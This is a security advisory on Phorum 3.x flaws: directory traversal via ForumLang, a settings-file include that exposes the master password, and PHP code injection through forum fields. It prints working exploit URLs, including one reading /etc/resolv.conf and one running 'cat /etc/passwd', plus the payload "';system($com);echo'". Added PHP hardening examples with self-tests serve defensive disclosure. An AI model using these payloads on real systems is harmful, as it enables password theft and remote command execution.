Phorum is a web based discussion software written in PHP. Unlike some popular web boards, Phorum uses a database to manage its messages. Several security vulnerabilities have been found that allow remote attackers to gain access to passwords stored by Phorum and used for access verification. These vulnerabilities also allow attackers to read the source of php files.
Credit:
The information has been provided by João Gouveia and Brian Moon.
Vulnerable systems:
Phorum versions 3.1 and higher (until version 3.2.9)
Immune systems:
Phorum 3.2.9
Exploit:
ForumLang:
Requesting a URL such as:
http://www.example.com/support/common.php?f=0&ForumLang=../../../../../../../etc/resolv.conf
will expose the content of /etc/resolv.conf, because the ForumLang value is spliced into an include path without validation.
Select forum bug:
In various scripts, a user-supplied variable selects the php script containing the settings for the chosen forum. An example would be: forums/list.php?f=<forum's id>
Faulty piece of code (in common.php):
<quote>
...
if($num || $f){
    if($f) $num=$f;
    if(file_exists("$admindir/forums/$num.php")){
        include "$admindir/forums/$num.php";
    }
....
</quote>
Knowing this, we can call other php scripts that might have interesting data instead of the forum's settings script. Although Phorum's security.txt advises users to protect their includes and configuration data using methods such as .htpasswd or relocating those files out of the document root, it is still possible to fetch them by exploiting this bug. If we call the file that is usually located in admin_dir/pages/master.php we get interesting information about Phorum, for example the "Master Password". With this password we can create/modify Phorum's databases and manage the whole system.
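Both bugs above have the same root cause: a request parameter (ForumLang, f) is spliced into a file path and included. The following is an added hardening example, not Phorum's own code. It assumes common.php reads the forum id from $_GET['f'] and the language from $_GET['ForumLang'], and that language files live under "$admindir/lang/<name>.php" (an assumption about the layout; the real one may differ). The forum id is constrained to a short positive integer and the language name to an explicit allow-list, and the resolved forum path is additionally checked to stay inside the forums directory.

```php
<?php
// Added hardening example (not Phorum's code). Assumed layout:
//   $admindir/forums/<id>.php   forum settings, id is a positive integer
//   $admindir/lang/<name>.php   language file, name from an allow-list

// Resolve a user-supplied forum id to a settings file, or return null.
function safe_forum_file(string $admindir, $f): ?string
{
    // A forum id is a short positive integer; "../x", "pages/master" and "0" are rejected here.
    if (!is_scalar($f) || !preg_match('/^[1-9][0-9]{0,8}$/', (string) $f)) {
        return null;
    }
    $base = realpath("$admindir/forums");
    $real = realpath("$admindir/forums/$f.php");
    if ($base === false || $real === false) {
        return null;
    }
    // Belt and braces: the resolved path must stay inside the forums directory.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Resolve a user-supplied language name against an explicit allow-list
// instead of splicing it into a path.
function safe_lang_file(string $admindir, $lang, array $allowed): ?string
{
    if (!is_string($lang) || !in_array($lang, $allowed, true)) {
        return null;
    }
    return "$admindir/lang/$lang.php";
}

// --- self-check on a constructed directory layout --------------------------
$admindir = sys_get_temp_dir() . '/phorum_demo_' . getmypid();
mkdir("$admindir/forums", 0700, true);
mkdir("$admindir/lang", 0700, true);
file_put_contents("$admindir/forums/1.php", "<?php \$ForumDisplay = 'Support';\n");
file_put_contents("$admindir/lang/english.php", "<?php \$lang = 'en';\n");

$forumIds = [
    '1',                                    // legitimate forum id
    '0',                                    // the f=0 seen in the advisory URL
    '../pages/master',                      // attempt to reach the admin pages
    '../../../../../../../etc/resolv.conf', // traversal
];
foreach ($forumIds as $f) {
    $r = safe_forum_file($admindir, $f);
    printf("f=%-40s -> %s\n", $f, $r === null ? 'rejected' : 'include ' . basename($r));
}
foreach (['english', '../../../../../../../etc/resolv.conf'] as $lang) {
    $r = safe_lang_file($admindir, $lang, ['english']);
    printf("ForumLang=%-32s -> %s\n", $lang, $r === null ? 'rejected' : 'include ' . basename($r));
}
// In real code the include happens only when the check returned a path:
//   if ($path !== null) { include $path; }

// Remove the constructed layout.
unlink("$admindir/forums/1.php");
unlink("$admindir/lang/english.php");
rmdir("$admindir/forums");
rmdir("$admindir/lang");
rmdir($admindir);
```

Only '1' and 'english' resolve to a file; every other input is rejected before any filesystem call that could reach outside the intended directory. The realpath comparison is redundant given the integer regex, but it keeps the check correct even if the id rule is later relaxed.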
Existing forum script:
In this situation, having access to the master password allows anyone to modify an existing forum.
<quote>
...
if($rec->folder=="0"){
    $data.=" \$ForumDisplay='$rec->display';\n";
    $data.=" \$ForumTableName='$rec->table_name';\n";
    $data.=" \$ForumModeration='$rec->moderation';\n";
    $data.=" \$ForumModEmail='$rec->mod_email';\n";
    $data.=" \$ForumModPass='$rec->mod_pass';\n";
....
$fp = fopen("$admindir/forums/$rec->id.php", "w");
fputs($fp, $data);
...
</quote>
As can be seen above, the field values are written into the generated php file without escaping, so we can add our own php code to the fields. Using the master password obtained through the problem described above, we edit one of the existing forums and add, for example in the 'ForumModEmail' field:
mod@vuln.host.tld';system($com);echo'
This would execute our code, supplied in the variable 'com', giving a URL of the sort:
forum/list.php?f=1&com=cat%20/etc/passwd
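The fix for the forum-writing code is to emit the field values as escaped PHP literals rather than interpolating them into a string, so that a quote or semicolon in a field stays data. This is an added example, not Phorum's own code; the field names follow the snippet above, and the record object and its values are constructed here for the demonstration.

```php
<?php
// Added example (not Phorum's code): generate forums/<id>.php with var_export()
// so that field contents cannot terminate the string literal and inject code.

// Build the settings file body for one forum record.
function build_forum_settings(object $rec): string
{
    $fields = [
        'ForumDisplay'    => $rec->display,
        'ForumTableName'  => $rec->table_name,
        'ForumModeration' => $rec->moderation,
        'ForumModEmail'   => $rec->mod_email,
        'ForumModPass'    => $rec->mod_pass,
    ];
    $data = "<?php\n";
    foreach ($fields as $name => $value) {
        // var_export() returns a quoted PHP literal with ' and \ escaped,
        // so whatever the admin typed is assigned as a string, never parsed as code.
        $data .= '$' . $name . ' = ' . var_export((string) $value, true) . ";\n";
    }
    return $data;
}

// Write the file; the forum id must pass the same positive-integer rule that
// common.php should apply when reading it, otherwise the path itself is attacker-shaped.
function write_forum_settings(string $admindir, object $rec): bool
{
    if (!preg_match('/^[1-9][0-9]{0,8}$/', (string) $rec->id)) {
        return false;
    }
    return file_put_contents("$admindir/forums/$rec->id.php", build_forum_settings($rec)) !== false;
}

// Constructed record whose mod_email contains a quote and a semicolon.
$rec = (object) [
    'id'         => 1,
    'display'    => 'Support',
    'table_name' => 'phorum_support',
    'moderation' => 'n',
    'mod_email'  => "mod@example.com'; x",
    'mod_pass'   => 'secret',
];
$body = build_forum_settings($rec);
echo $body;

// Parse the generated file to confirm it is a plain assignment of a string.
$tmp = tempnam(sys_get_temp_dir(), 'forum');
file_put_contents($tmp, $body);
include $tmp;
unlink($tmp);
var_dump($ForumModEmail === "mod@example.com'; x"); // bool(true)
```

The generated line for the email field reads `$ForumModEmail = 'mod@example.com\'; x';`, and including the file yields the original string unchanged, which is the property the interpolating version lacks.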